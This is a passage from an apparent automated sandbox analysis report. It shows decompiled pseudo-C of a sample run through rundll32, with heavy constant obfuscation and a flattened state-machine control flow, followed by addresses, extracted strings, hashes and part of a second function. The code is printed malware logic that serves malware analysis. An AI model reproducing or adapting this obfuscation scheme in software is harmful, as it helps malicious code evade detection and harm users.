				_v2896 = _v2896 ^ 0x0000161a;
				_v2964 = 0x3757;
				_v2964 = _v2964 ^ 0xb842d749;
				_v2964 = _v2964 >> 4;
				_v2964 = _v2964 ^ 0x0b847e39;
				_v3104 = 0xe457;
				_v3104 = _v3104 << 0x10;
				_v3104 = _v3104 << 5;
				_v3104 = _v3104 << 0x10;
				_v3104 = _v3104 ^ 0x00004831;
				_v3016 = 0x6f58;
				_v3016 = _v3016 | 0x2b2730ea;
				_t292 =  &_v3016; // 0x2b2730ea
				_t852 = 0x35;
				_v3016 =  *_t292 * 0x3f;
				_v3016 = _v3016 ^ 0x9eb8709b;
				_v3112 = 0x7907;
				_v3112 = _v3112 * 0x17;
				_v3112 = _v3112 * 0x48;
				_v3112 = _v3112 + 0x5449;
				_v3112 = _v3112 ^ 0x030f5843;
				_v2904 = 0x337c;
				_v2904 = _v2904 ^ 0x4212fafe;
				_v2904 = _v2904 ^ 0x4212b61a;
				_v2992 = 0x1687;
				_v2992 = _v2992 + 0xffffc1f0;
				_v2992 = _v2992 / _t852;
				_v2992 = _v2992 ^ 0x04d4fea0;
				_v3000 = 0x9e7f;
				_v3000 = _v3000 * 0x2d;
				_v3000 = _v3000 | 0xca2ea772;
				_v3000 = _v3000 ^ 0xca3ffc76;
				_v3008 = 0x5219;
				_v3008 = _v3008 ^ 0xa82c57ba;
				_v3008 = _v3008 + 0xffff8e06;
				_v3008 = _v3008 ^ 0xa82bf961;
				_v2912 = 0xe428;
				_v2912 = _v2912 >> 2;
				_v2912 = _v2912 ^ 0x00003bf8;
				_v3096 = 0x9cb7;
				_v3096 = _v3096 | 0x5b75b6f7;
				_v3096 = _v3096 * 0x3d;
				_v3096 = _v3096 * 0x48;
				_v3096 = _v3096 ^ 0x1c146541;
				_v2984 = 0xcac8;
				_t853 = 0x76;
				_v2984 = _v2984 / _t853;
				_v2984 = _v2984 | 0xa8d63fca;
				_v2984 = _v2984 ^ 0xa8d601bb;
				_v3088 = 0x430a;
				_v3088 = _v3088 ^ 0x9f6ea207;
				_v3088 = _v3088 + 0xffff1c4e;
				_v3088 = _v3088 ^ 0x717e2497;
				_v3088 = _v3088 ^ 0xee13d21f;
				_v2944 = 0x3230;
				_v2944 = _v2944 << 8;
				_v2944 = _v2944 ^ 0x00322685;
				_v3024 = 0x5cb2;
				_v3024 = _v3024 + 0x9fe6;
				_v3024 = _v3024 + 0xffffb2bd;
				_v3024 = _v3024 ^ 0x00009e0e;
				_v3032 = 0xc0e8;
				_v3032 = _v3032 ^ 0x7becda2f;
				_v3032 = _v3032 + 0xffff6f0d;
				_v3032 = _v3032 ^ 0x7beb9bf2;
				_v2920 = 0x65a0;
				_v2920 = _v2920 + 0xd736;
				_v2920 = _v2920 ^ 0x000139a9;
				_v2924 = 0x5083;
				_v2924 = _v2924 + 0x59cc;
				_v2924 = _v2924 ^ 0x0000f707;
				_v3068 = 0x86f8;
				_v3068 = _v3068 << 8;
				_v3068 = _v3068 | 0x7a86fc50;
				_v3068 = _v3068 ^ 0x7a86c1ed;
				_v3120 = 0x857c;
				_t854 = 0x43;
				_v3120 = _v3120 * 0x60;
				_v3120 = _v3120 * 0x19;
				_v3120 = _v3120 << 1;
				_v3120 = _v3120 ^ 0x09c6d6a0;
				_v2960 = 0xda3d;
				_v2960 = _v2960 << 9;
				_v2960 = _v2960 + 0xffffd369;
				_v2960 = _v2960 ^ 0x01b47a39;
				_v2968 = 0x8770;
				_v2968 = _v2968 | 0x22b91695;
				_v2968 = _v2968 + 0xcd52;
				_v2968 = _v2968 ^ 0x22ba6b60;
				_v2976 = 0x6162;
				_v2976 = _v2976 | 0x0b801a40;
				_v2976 = _v2976 + 0xdb1c;
				_v2976 = _v2976 ^ 0x0b814300;
				_v2940 = 0x6c41;
				_v2940 = _v2940 | 0x31be0dbb;
				_v2940 = _v2940 ^ 0x31be1c15;
				_v3036 = 0xe4c0;
				_v3036 = _v3036 | 0xce2ca5d0;
				_v3036 = _v3036 * 0x64;
				_v3036 = _v3036 ^ 0x8989b291;
				_v2880 = 0xb319;
				_v2880 = _v2880 + 0xffff6f25;
				_v2880 = _v2880 ^ 0x00007aab;
				_v2936 = 0x20e4;
				_v2936 = _v2936 / _t854;
				_v2936 = _v2936 ^ 0x00006061;
				_v2996 = 0x7312;
				_v2996 = _v2996 + 0x9ed2;
				_v2996 = _v2996 << 6;
				_v2996 = _v2996 ^ 0x00445532;
				_v3084 = 0x43a7;
				_v3084 = _v3084 | 0xea2e2a73;
				_v3084 = _v3084 ^ 0xccadc40f;
				_v3084 = _v3084 + 0xffffe2bd;
				_v3084 = _v3084 ^ 0x2683f586;
				_v3124 = 0x2a4e;
				_v3124 = _v3124 * 0x1c;
				_v3124 = _v3124 | 0x2f25bc51;
				_v3124 = _v3124 + 0x1de;
				_v3124 = _v3124 ^ 0x2f25b57b;
				_v3052 = 0x8dcd;
				_v3052 = _v3052 + 0xffffe03b;
				_v3052 = _v3052 + 0xffff4c85;
				_v3052 = _v3052 ^ 0xfffff37a;
				_v3004 = 0xcbf1;
				_v3004 = _v3004 | 0x47bef84c;
				_v3004 = _v3004 + 0xffff64dc;
				_v3004 = _v3004 ^ 0x47be4748;
				_v2952 = 0x3eb1;
				_v2952 = _v2952 << 5;
				_v2952 = _v2952 >> 0xa;
				_v2952 = _v2952 ^ 0x00000206;
				_v3080 = 0xdc90;
				_v3080 = _v3080 + 0xffff270f;
				_v3080 = _v3080 * 0xe;
				_v3080 = _v3080 >> 1;
				_v3080 = _v3080 ^ 0x00005d8a;
				_t855 = _v2852;
				_v3160 = _v2848;
				_v2864 = _t855;
				while(1) {
					_t816 = _v3156;
					while(1) {
						L2:
						_t863 = _t768 - 0x199af63b;
						if(_t863 <= 0) {
							break;
						}
						__eflags = _t768 - 0x1b8163a4;
						if(_t768 == 0x1b8163a4) {
							_t696 = E001A6EE4(_t841, _v2960, _v2968, _v2976, _v2940,  &_v2860);
							_t859 = _t859 + 0x10;
							_t768 = 0x199af63b;
							__eflags = _t696;
							_t697 = 1;
							_t764 =  !=  ? _t697 : _t764;
							_v2868 = _t764;
							goto L45;
						} else {
							__eflags = _t768 - 0x1c2ced04;
							if(__eflags == 0) {
								_push(_v3112);
								_push(_v3016);
								E001AE32E(E001A5EBA(_v3104, 0x1001f100, __eflags), __eflags, _v2992, _v3000,  &_v2560, _v3008, 0x400,  &_v2048, _v2912,  &_v2688,  &_v2816, _v3096);
								E001AED35(_v2984, _t700, _v3088, _v2944);
								_t859 = _t859 + 0x38;
								_t768 = 0xf4be180;
								goto L41;
							} else {
								__eflags = _t768 - 0x1cd29216;
								if(_t768 == 0x1cd29216) {
									_v2860 = _v2860 & 0x00000000;
									_v2856 = _v2856 & 0x00000000;
									_t622 =  &_v3120; // 0xe047372a
									_t773 = _v3024;
									E001BA59F(_t773, _v3032, _v2920,  &_v2688, _v2924,  &_v2560,  &_v2860, _v3068,  *_t622,  &_v2852, _t816,  &_v2048);
									_t859 = _t859 + 0x28;
									asm("sbb ecx, ecx");
									_t768 = (_t773 & 0x0615281c) + 0x156c3b88;
									goto L12;
								} else {
									__eflags = _t768 - 0x23a77b80;
									if(_t768 == 0x23a77b80) {
										_t846 = E001A5EA7( *((intOrPtr*)(_t838 + 4)));
										_push(_t768);
										_t855 = E001B922B(_t718);
										_t860 = _t859 + 0xc;
										_v2864 = _t855;
										__eflags = _t855;
										if(__eflags != 0) {
											_t724 = E001B2A00( *_t838, _t846, __eflags, _v2892, _v3128, _t855, _v3136, _v3144,  *((intOrPtr*)(_t838 + 4)));
											_t859 = _t860 + 0x18;
											_v3160 = _t724;
											__eflags = _t724;
											if(__eflags == 0) {
												_push(_v2932);
												_t776 = _v3072;
												L48:
												E001AE380(_t776, _t855);
											} else {
												_t768 = 0x9f13b62;
												L41:
												_t816 = _v3156;
												goto L35;
											}
										}
									} else {
										__eflags = _t768 - 0x304496b8;
										if(_t768 == 0x304496b8) {
											_t778 =  &_v2844;
											_t599 =  &_v3116; // 0xe047372a
											E001B5136(_t778,  &_v2836, _v3064,  *_t599, _v2980, _v3012);
											_t859 = _t859 + 0x10;
											asm("sbb ecx, ecx");
											_t768 = (_t778 & 0x3803c052) + 0x279610c;
											goto L12;
										} else {
											__eflags = _t768 - 0x31ff1d09;
											if(_t768 == 0x31ff1d09) {
												E001AE380(_v3084, _v2836, _v3124);
												_t768 = 0x279610c;
												L12:
												while(1) {
													_t816 = _v3156;
													goto L2;
												}
											} else {
												__eflags = _t768 - 0x3a7d215e;
												if(__eflags != 0) {
													L45:
													__eflags = _t768 - 0x2678ae6d;
													if(__eflags != 0) {
														while(1) {
															_t816 = _v3156;
															goto L2;
														}
													}
												} else {
													_push(_v2972);
													_push(_v3028);
													_t744 = E001A5EBA(_v3092, 0x1001f0b0, __eflags);
													_t569 =  *0x1001f9d4 + 8; // 0xd
													_t573 =  *0x1001f9d4 + 8; // 0xd
													_t576 =  *0x1001f9d4 + 8; // 0xd
													_t579 =  *0x1001f9d4 + 8; // 0xd
													E001A867F(_t744, __eflags, _v3020, _v3076, _v3140,  *( *_t579) & 0x000000ff, _v2900,  *( *_t576 + 1) & 0x000000ff, _v3108,  *( *_t573 + 3) & 0x000000ff,  &_v2688, _v2988,  *( *_t569 + 2) & 0x000000ff);
													E001AED35(_v2956, _t744, _v3100, _v2916);
													_t760 =  *0x1001f9d4;
													_t859 = _t859 + 0x3c;
													_t768 = 0x15c4d247;
													_t587 = _t760 + 8; // 0xd
													_t816 =  *( *_t587 + 4) & 0x0000ffff;
													_t724 = _v3160;
													_v3156 =  *( *_t587 + 4) & 0x0000ffff;
													L35:
													_t841 = _v2876;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L49:
						return _t764;
					}
					if(_t863 == 0) {
						E001AE380(_v3036, _v2860, _v2880);
						_t768 = 0x156c3b88;
						goto L12;
					} else {
						_t864 = _t768 - 0xf4be180;
						if(_t864 > 0) {
							__eflags = _t768 - 0x122826c5;
							if(_t768 == 0x122826c5) {
								_v2872 = E001B0614();
								_t768 = 0x23a77b80;
								goto L12;
							} else {
								__eflags = _t768 - 0x156c3b88;
								if(_t768 == 0x156c3b88) {
									E001AE380(_v2936, _v2852, _v2996);
									_t768 = 0x31ff1d09;
									goto L12;
								} else {
									__eflags = _t768 - 0x15c4d247;
									if(_t768 != 0x15c4d247) {
										goto L45;
									} else {
										_t839 =  &_v2560;
										_t789 = 6;
										_t766 = _v2872 % _t789 + 1;
										__eflags = _t766;
										if(__eflags != 0) {
											__eflags = 1;
											do {
												_t844 = (_v2872 & 0x0000000f) + 4;
												E001A7468( &_v2872, _t844, _t839, _v3044, 1, _v2896, _v2964);
												_t859 = _t859 + 0x14;
												_t840 = _t839 + _t844 * 2;
												_t763 = 0x2f;
												 *_t840 = _t763;
												_t839 = _t840 + 2;
												_t766 = _t766 - 1;
												__eflags = _t766;
											} while (__eflags != 0);
											_t855 = _v2864;
											_t841 = _v2876;
										}
										_t764 = _v2868;
										 *_t839 = 0;
										_t768 = 0x150ae86;
										_t724 = _v3160;
										_t838 = _a12;
										continue;
									}
								}
							}
						} else {
							if(_t864 == 0) {
								E001AAF28( &_v2836,  &_v2816,  &_v2852);
								_pop(_t792);
								asm("sbb ecx, ecx");
								_t768 = (_t792 & 0xead3750d) + 0x31ff1d09;
								goto L12;
							} else {
								if(_t768 == 0x150ae86) {
									E001BBD5E( &_v2816, _t838, __eflags);
									_t768 = 0x1c2ced04;
									goto L12;
								} else {
									if(_t768 == 0x279610c) {
										E001AE380(_v3052, _v2844, _v3004);
										_t768 = 0xdcfda18;
										goto L12;
									} else {
										if(_t768 == 0x9f13b62) {
											_v2820 = _t724;
											_v2824 = _t855;
											_v2828 = 1;
											0x1a06b6( &_v2828, _v3060, _v3040);
											_t859 = _t859 + 0xc;
											asm("sbb ecx, ecx");
											_t768 = (_v2948 & 0x2274bca0) + 0xdcfda18;
											__eflags = _t768;
											goto L12;
										} else {
											if(_t768 != 0xdcfda18) {
												goto L45;
											} else {
												_push(_v3080);
												_t776 = _v2952;
												goto L48;
											}
										}
									}
								}
							}
						}
					}
					goto L49;
				}
			}

0x001b2deb
0x001b2df4
0x001b2df5
0x001b2dfd
0x001b2dff
0x001b2e00
0x001b2e01
0x001b2e02
0x001b2e09
0x001b2e0e
0x001b2e19
0x001b2e1c
0x001b2e29
0x001b2e34
0x001b2e36
0x001b2e41
0x001b2e46
0x001b2e51
0x001b2e5c
0x001b2e67
0x001b2e72
0x001b2e7d
0x001b2e85
0x001b2e8d
0x001b2e92
0x001b2e9a
0x001b2ea5
0x001b2eb0
0x001b2ebb
0x001b2ec6
0x001b2ece
0x001b2ed6
0x001b2edb
0x001b2ee3
0x001b2eeb
0x001b2f00
0x001b2f01
0x001b2f08
0x001b2f0f
0x001b2f1a
0x001b2f27
0x001b2f2b
0x001b2f30
0x001b2f35
0x001b2f3d
0x001b2f48
0x001b2f53
0x001b2f5e
0x001b2f66
0x001b2f6e
0x001b2f76
0x001b2f7b
0x001b2f83
0x001b2f91
0x001b2f95
0x001b2f9d
0x001b2fa5
0x001b2fad
0x001b2fb5
0x001b2fba
0x001b2fc2
0x001b2fca
0x001b2fd2
0x001b2fda
0x001b2fdf
0x001b2fe7
0x001b2fef
0x001b2ff7
0x001b3002
0x001b300d
0x001b301a
0x001b3025
0x001b3030
0x001b303b
0x001b3043
0x001b304b
0x001b3050
0x001b3058
0x001b306d
0x001b306e
0x001b3075
0x001b307d
0x001b3088
0x001b3090
0x001b3098
0x001b30a0
0x001b30a8
0x001b30b0
0x001b30b8
0x001b30c5
0x001b30c9
0x001b30d1
0x001b30e4
0x001b30f3
0x001b30fa
0x001b3105
0x001b3119
0x001b3120
0x001b3128
0x001b3133
0x001b313b
0x001b3140
0x001b3148
0x001b3150
0x001b315b
0x001b3166
0x001b3171
0x001b317c
0x001b3187
0x001b3192
0x001b319d
0x001b31a8
0x001b31b0
0x001b31b8
0x001b31c5
0x001b31c9
0x001b31d1
0x001b31dc
0x001b31ec
0x001b31f3
0x001b31fe
0x001b3206
0x001b320b
0x001b3210
0x001b3215
0x001b321d
0x001b3225
0x001b322d
0x001b3235
0x001b323d
0x001b3248
0x001b3253
0x001b325e
0x001b326b
0x001b326f
0x001b3277
0x001b327f
0x001b3287
0x001b3292
0x001b329d
0x001b32a7
0x001b32b2
0x001b32bd
0x001b32c8
0x001b32d3
0x001b32de
0x001b32ec
0x001b32f1
0x001b32f7
0x001b3303
0x001b3308
0x001b330e
0x001b3316
0x001b3321
0x001b332c
0x001b3337
0x001b3342
0x001b334d
0x001b3358
0x001b3363
0x001b336b
0x001b3376
0x001b3381
0x001b338c
0x001b3394
0x001b339f
0x001b33a7
0x001b33ac
0x001b33b1
0x001b33b6
0x001b33be
0x001b33c9
0x001b33d4
0x001b33dc
0x001b33dd
0x001b33e4
0x001b33ef
0x001b33fc
0x001b3405
0x001b3409
0x001b3411
0x001b3419
0x001b3424
0x001b342f
0x001b343a
0x001b3445
0x001b3459
0x001b3460
0x001b346b
0x001b347e
0x001b3485
0x001b3490
0x001b349b
0x001b34a6
0x001b34b1
0x001b34bc
0x001b34c7
0x001b34d2
0x001b34da
0x001b34e5
0x001b34ed
0x001b34fa
0x001b3503
0x001b3507
0x001b3511
0x001b3525
0x001b352a
0x001b3533
0x001b353e
0x001b3549
0x001b3551
0x001b3559
0x001b3561
0x001b3569
0x001b3571
0x001b357c
0x001b3584
0x001b358f
0x001b359a
0x001b35a5
0x001b35b0
0x001b35bb
0x001b35c6
0x001b35d1
0x001b35dc
0x001b35e7
0x001b35f2
0x001b35fd
0x001b3608
0x001b3613
0x001b361e
0x001b3629
0x001b3631
0x001b3636
0x001b363e
0x001b3646
0x001b3653
0x001b3654
0x001b365d
0x001b3661
0x001b3665
0x001b366d
0x001b3678
0x001b3680
0x001b368b
0x001b3696
0x001b36a1
0x001b36ac
0x001b36b7
0x001b36c2
0x001b36cd
0x001b36d8
0x001b36e3
0x001b36ee
0x001b36f9
0x001b3704
0x001b370f
0x001b371a
0x001b372d
0x001b3734
0x001b373f
0x001b374a
0x001b3755
0x001b3760
0x001b3774
0x001b377b
0x001b3786
0x001b3791
0x001b379c
0x001b37a4
0x001b37af
0x001b37b7
0x001b37bf
0x001b37c7
0x001b37cf
0x001b37d7
0x001b37e4
0x001b37e8
0x001b37f0
0x001b37f8
0x001b3800
0x001b3808
0x001b3810
0x001b3818
0x001b3820
0x001b382b
0x001b3836
0x001b3841
0x001b384c
0x001b3857
0x001b385f
0x001b3867
0x001b3872
0x001b387a
0x001b3887
0x001b388b
0x001b388f
0x001b389e
0x001b38a5
0x001b38a9
0x001b38b0
0x001b38b0
0x001b38b4
0x001b38b4
0x001b38b4
0x001b38ba
0x00000000
0x00000000
0x001b3af0
0x001b3af6
0x001b3e31
0x001b3e36
0x001b3e39
0x001b3e3e
0x001b3e42
0x001b3e43
0x001b3e4a
0x00000000
0x001b3afc
0x001b3afc
0x001b3b02
0x001b3d70
0x001b3d79
0x001b3dd9
0x001b3df5
0x001b3dfe
0x001b3e01
0x00000000
0x001b3b08
0x001b3b08
0x001b3b0e
0x001b3cf6
0x001b3d06
0x001b3d17
0x001b3d4c
0x001b3d53
0x001b3d58
0x001b3d5d
0x001b3d65
0x00000000
0x001b3b14
0x001b3b14
0x001b3b1a
0x001b3c86
0x001b3c9e
0x001b3ca5
0x001b3ca7
0x001b3caa
0x001b3cb1
0x001b3cb3
0x001b3cd4
0x001b3cd9
0x001b3cdc
0x001b3ce0
0x001b3ce2
0x001b3e5e
0x001b3e65
0x001b3e69
0x001b3e6b
0x001b3ce8
0x001b3ce8
0x001b3ced
0x001b3ced
0x00000000
0x001b3ced
0x001b3ce2
0x001b3b20
0x001b3b20
0x001b3b26
0x001b3c47
0x001b3c4e
0x001b3c56
0x001b3c5b
0x001b3c60
0x001b3c68
0x00000000
0x001b3b2c
0x001b3b2c
0x001b3b32
0x001b3c22
0x001b3c28
0x001b3962
0x001b38b0
0x001b38b0
0x00000000
0x001b38b0
0x001b3b38
0x001b3b38
0x001b3b3e
0x001b3e51
0x001b3e51
0x001b3e57
0x001b38b0
0x001b38b0
0x00000000
0x001b38b0
0x001b38b0
0x001b3b44
0x001b3b44
0x001b3b50
0x001b3b5b
0x001b3b6c
0x001b3b88
0x001b3b99
0x001b3bad
0x001b3bca
0x001b3be6
0x001b3beb
0x001b3bf0
0x001b3bf3
0x001b3bf8
0x001b3bfb
0x001b3bff
0x001b3c03
0x001b3c07
0x001b3c07
0x00000000
0x001b3c07
0x001b3b3e
0x001b3b32
0x001b3b26
0x001b3b1a
0x001b3b0e
0x001b3b02
0x001b3e74
0x001b3e7d
0x001b3e7d
0x001b38c0
0x001b3ae0
0x001b3ae6
0x00000000
0x001b38c6
0x001b38cb
0x001b38cd
0x001b39ce
0x001b39d4
0x001b3aba
0x001b3ac1
0x00000000
0x001b39da
0x001b39da
0x001b39e0
0x001b3a97
0x001b3a9d
0x00000000
0x001b39e6
0x001b39e6
0x001b39ec
0x00000000
0x001b39f2
0x001b39f9
0x001b3a04
0x001b3a09
0x001b3a09
0x001b3a0a
0x001b3a0e
0x001b3a0f
0x001b3a36
0x001b3a3c
0x001b3a41
0x001b3a44
0x001b3a49
0x001b3a4a
0x001b3a4d
0x001b3a50
0x001b3a50
0x001b3a50
0x001b3a53
0x001b3a5a
0x001b3a5a
0x001b3a61
0x001b3a6a
0x001b3a6d
0x001b3a72
0x001b3a76
0x00000000
0x001b3a76
0x001b39ec
0x001b39e0
0x001b38d3
0x001b38d3
0x001b39b6
0x001b39bd
0x001b39be
0x001b39c6
0x00000000
0x001b38d9
0x001b38df
0x001b3994
0x001b3999
0x00000000
0x001b38e5
0x001b38eb
0x001b3980
0x001b3986
0x00000000
0x001b38ed
0x001b38f3
0x001b391a
0x001b3926
0x001b3934
0x001b394a
0x001b394f
0x001b3954
0x001b395c
0x001b395c
0x00000000
0x001b38f5
0x001b38fb
0x00000000
0x001b3901
0x001b3901
0x001b3905
0x00000000
0x001b3905
0x001b38fb
0x001b38f3
0x001b38eb
0x001b38df
0x001b38d3
0x001b38cd
0x00000000
0x001b38c0

Strings

0'+, xrefs: 001B33D4
|3, xrefs: 001B3419
*7G, xrefs: 001B3266
ym, xrefs: 001B2E29
s, xrefs: 001B3150
Td, xrefs: 001B2E92
(, xrefs: 001B34C7
a`, xrefs: 001B377B
IT, xrefs: 001B3409
b-, xrefs: 001B2F5E
Al, xrefs: 001B36EE
H1, xrefs: 001B2FD2
1H, xrefs: 001B33B6
h=, xrefs: 001B319D
s*., xrefs: 001B37B7
6|, xrefs: 001B2E51
*7G, xrefs: 001B3C4E
W7, xrefs: 001B3376
qZ=, xrefs: 001B2F0F
ba, xrefs: 001B36C2
N*, xrefs: 001B37D7
26, xrefs: 001B330E
^!}:, xrefs: 001B3B38
sp, xrefs: 001B31A8
2UD, xrefs: 001B37A4

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ($*7G$*7G$1H$26$2UD$6|$Al$H1$IT$N*$Td$W7$^!}:$a`$b-$ba$h=$qZ=$s*.$sp$s$ym$|3$0'+
API String ID: 0-2786088476
Opcode ID: 4bc9a5566c49b5c311dbb4cce05d57cec8af07b3c1335ab91b723158be9b1e11
Instruction ID: 1bf870322f340d6241a2e8b9f1e70a442fe0d9b26fc848a2fa980eb2022fc96f
Opcode Fuzzy Hash: 4bc9a5566c49b5c311dbb4cce05d57cec8af07b3c1335ab91b723158be9b1e11
Instruction Fuzzy Hash: EF8222715083818FE378CF25C98AB9BBBE1BBC4304F10891DE1DA962A0D7B59959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001B1E7D, Relevance: 29.2, Strings: 23, Instructions: 437
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E001B1E7D(intOrPtr __ecx, intOrPtr __edx) {
				char _v524;
				signed int _v528;
				intOrPtr _v532;
				intOrPtr _v544;
				char _v548;
				intOrPtr _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				unsigned int _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				intOrPtr _t466;
				void* _t468;
				intOrPtr _t470;
				intOrPtr _t475;
				void* _t479;
				intOrPtr _t482;
				intOrPtr _t485;
				intOrPtr _t494;
				signed int _t497;
				signed int _t498;
				signed int _t499;
				signed int _t500;
				signed int _t501;
				signed int _t502;
				signed int _t503;
				signed int _t504;
				void* _t505;
				intOrPtr _t546;
				signed int _t547;
				intOrPtr _t551;
				void* _t552;
				void* _t553;
				void* _t557;

				_v552 = __edx;
				_t551 = __ecx;
				_v556 = _v556 & 0x00000000;
				_v528 = _v528 & 0x00000000;
				_v532 = 0x6766ac;
				_v728 = 0x2d62;
				_v728 = _v728 | 0x6ce9e83c;
				_v728 = _v728 ^ 0x7f524897;
				_v728 = _v728 ^ 0x11bba5e9;
				_v672 = 0x29;
				_v672 = _v672 << 6;
				_v672 = _v672 | 0x9f4dd241;
				_v672 = _v672 ^ 0x9f4dedb7;
				_v648 = 0xdcd3;
				_v648 = _v648 ^ 0x4b8f2daf;
				_v648 = _v648 | 0x8b74ccaa;
				_v648 = _v648 ^ 0xcbffbdf2;
				_v680 = 0xd9a0;
				_v680 = _v680 + 0xffff83d2;
				_v680 = _v680 << 1;
				_v680 = _v680 ^ 0x0000ae8c;
				_v668 = 0xa13e;
				_v668 = _v668 ^ 0x33b1fc45;
				_v668 = _v668 + 0xffff8ac2;
				_v668 = _v668 ^ 0x33b0b4d9;
				_v608 = 0x4403;
				_v608 = _v608 * 0x7d;
				_v608 = _v608 ^ 0x00213dd9;
				_t547 = 0x8e1af5;
				_v704 = 0x7b03;
				_v704 = _v704 << 0xe;
				_t497 = 0x59;
				_v704 = _v704 / _t497;
				_v704 = _v704 + 0x1244;
				_v704 = _v704 ^ 0x00588ffd;
				_v736 = 0x78e6;
				_v736 = _v736 ^ 0x3729ec33;
				_v736 = _v736 ^ 0x368de781;
				_v736 = _v736 | 0xa3aa86c9;
				_v736 = _v736 ^ 0xa3ae8441;
				_v664 = 0xa0c1;
				_v664 = _v664 ^ 0xeb385610;
				_t498 = 0x2c;
				_v664 = _v664 * 0x55;
				_v664 = _v664 ^ 0x19e9e19c;
				_v632 = 0xa0f0;
				_v632 = _v632 + 0x6a99;
				_v632 = _v632 | 0x8e6e44ff;
				_v632 = _v632 ^ 0x8e6f4d90;
				_v696 = 0x6dea;
				_v696 = _v696 | 0xc35eca27;
				_v696 = _v696 ^ 0x3ea55097;
				_v696 = _v696 | 0x31277f50;
				_v696 = _v696 ^ 0xfdffccad;
				_v712 = 0xf584;
				_v712 = _v712 >> 7;
				_v712 = _v712 << 3;
				_v712 = _v712 | 0x8174ddf2;
				_v712 = _v712 ^ 0x8174fc6c;
				_v732 = 0x4454;
				_v732 = _v732 / _t498;
				_v732 = _v732 << 0xc;
				_v732 = _v732 ^ 0x0018a645;
				_v740 = 0xc5e1;
				_v740 = _v740 + 0xffff4490;
				_v740 = _v740 | 0x43b92451;
				_v740 = _v740 + 0xdc57;
				_v740 = _v740 ^ 0x43ba6118;
				_v660 = 0xac0a;
				_t499 = 0xd;
				_v660 = _v660 * 0x58;
				_v660 = _v660 ^ 0x8e182767;
				_v660 = _v660 ^ 0x8e2325fc;
				_v572 = 0xc7f5;
				_v572 = _v572 | 0xd9e3d29a;
				_v572 = _v572 ^ 0xd9e3b8c0;
				_v576 = 0xcad2;
				_v576 = _v576 * 0x2e;
				_v576 = _v576 ^ 0x00244e3c;
				_v724 = 0x585e;
				_v724 = _v724 >> 8;
				_v724 = _v724 / _t499;
				_v724 = _v724 | 0x48570f4d;
				_v724 = _v724 ^ 0x48572c54;
				_v568 = 0x430c;
				_t500 = 0x15;
				_v568 = _v568 * 0x3b;
				_v568 = _v568 ^ 0x000f293f;
				_v584 = 0xc2dd;
				_v584 = _v584 * 0x16;
				_v584 = _v584 ^ 0x0010a62c;
				_v604 = 0x78f7;
				_v604 = _v604 ^ 0x857f7f2e;
				_v604 = _v604 ^ 0x857f2656;
				_v644 = 0x6796;
				_v644 = _v644 ^ 0xc7373988;
				_v644 = _v644 | 0x85469171;
				_v644 = _v644 ^ 0xc777e4e5;
				_v612 = 0x2fdb;
				_v612 = _v612 ^ 0x0a8ba0bd;
				_v612 = _v612 ^ 0x0a8bbe40;
				_v652 = 0xb46b;
				_v652 = _v652 / _t500;
				_v652 = _v652 << 5;
				_v652 = _v652 ^ 0x000140f0;
				_v628 = 0xf195;
				_t501 = 0x6e;
				_v628 = _v628 * 0x56;
				_v628 = _v628 << 0xa;
				_v628 = _v628 ^ 0x44a0534f;
				_v636 = 0xe32d;
				_v636 = _v636 + 0xbea;
				_v636 = _v636 << 0xe;
				_v636 = _v636 ^ 0x3bc59200;
				_v708 = 0x294c;
				_v708 = _v708 / _t501;
				_v708 = _v708 << 5;
				_v708 = _v708 + 0xa940;
				_v708 = _v708 ^ 0x000091f0;
				_v716 = 0x1cd8;
				_v716 = _v716 >> 2;
				_v716 = _v716 + 0xffff9aec;
				_v716 = _v716 * 0x55;
				_v716 = _v716 ^ 0xffe0cfb4;
				_v620 = 0xbaec;
				_v620 = _v620 >> 0xd;
				_t502 = 0x52;
				_v620 = _v620 * 0x65;
				_v620 = _v620 ^ 0x00004376;
				_v588 = 0xe39b;
				_v588 = _v588 * 0x57;
				_v588 = _v588 ^ 0x004d02e8;
				_v700 = 0xaf51;
				_v700 = _v700 << 0xe;
				_v700 = _v700 / _t502;
				_v700 = _v700 ^ 0x4f7dcd1e;
				_v700 = _v700 ^ 0x4ff52a73;
				_v596 = 0x5587;
				_v596 = _v596 + 0x4d2f;
				_v596 = _v596 ^ 0x0000d774;
				_v656 = 0xcc72;
				_t503 = 0x67;
				_v656 = _v656 * 0xf;
				_v656 = _v656 / _t503;
				_v656 = _v656 ^ 0x000077da;
				_v744 = 0x2fc2;
				_v744 = _v744 << 5;
				_v744 = _v744 + 0xffff4d22;
				_v744 = _v744 ^ 0xdd17369c;
				_v744 = _v744 ^ 0xdd122810;
				_v616 = 0xa378;
				_v616 = _v616 + 0xffff7c5d;
				_v616 = _v616 ^ 0x00005d86;
				_v640 = 0x5a5;
				_v640 = _v640 >> 0x10;
				_v640 = _v640 | 0xfef239f0;
				_v640 = _v640 ^ 0xfef23b58;
				_v720 = 0x52ce;
				_v720 = _v720 + 0xffff33a3;
				_v720 = _v720 >> 1;
				_v720 = _v720 >> 0xa;
				_v720 = _v720 ^ 0x001fb42b;
				_v688 = 0x5c23;
				_t504 = 0x50;
				_v688 = _v688 * 0x55;
				_v688 = _v688 + 0x1231;
